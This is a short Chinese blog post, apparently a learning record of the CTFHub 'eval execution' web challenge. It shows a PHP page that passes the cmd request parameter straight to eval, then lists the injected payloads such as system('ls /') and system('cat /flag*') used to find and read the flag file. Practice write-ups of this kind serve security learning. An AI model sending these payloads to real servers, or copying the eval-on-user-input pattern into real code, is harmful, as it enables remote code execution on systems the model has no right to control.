CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
张较瘦_7 分钟前
Spring Boot | 学习Spring Boot 3要有哪些Java基础?
java·spring boot·学习
阿宁又菜又爱玩19 分钟前
Mybatis学习
java·学习·mybatis
走在路上的菜鸟1 小时前
Android学Dart学习笔记第十一节 错误处理
android·笔记·学习·flutter
van久1 小时前
.Net Core 学习:Razor Pages -- EF Core工作原理
数据库·学习·.netcore
清涧游1 小时前
第九章-NOP团队dmz-A
笔记·学习·安全
sensen_kiss1 小时前
INT303 Big Data Analysis 大数据分析 Pt.10 分析模型和混合模型
大数据·学习·机器学习·数据挖掘·数据分析
QiZhang | UESTC1 小时前
学习日记day41
学习
光头程序员1 小时前
学习笔记——常识解答之垃圾回收机制
java·笔记·学习
爱吃番茄鼠骗2 小时前
Linux操作系统———线程同步
linux·学习
晨曦5432102 小时前
学习数据分析第一天
学习
热门推荐
01GitHub 镜像站点02【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)03React CVE-2025-55182漏洞排查与修复指南04UV安装并设置国内源05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06BongoCat - 跨平台键盘猫动画工具07本地部署阿里最新开源的Z-Image08Linux下V2Ray安装配置指南09智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)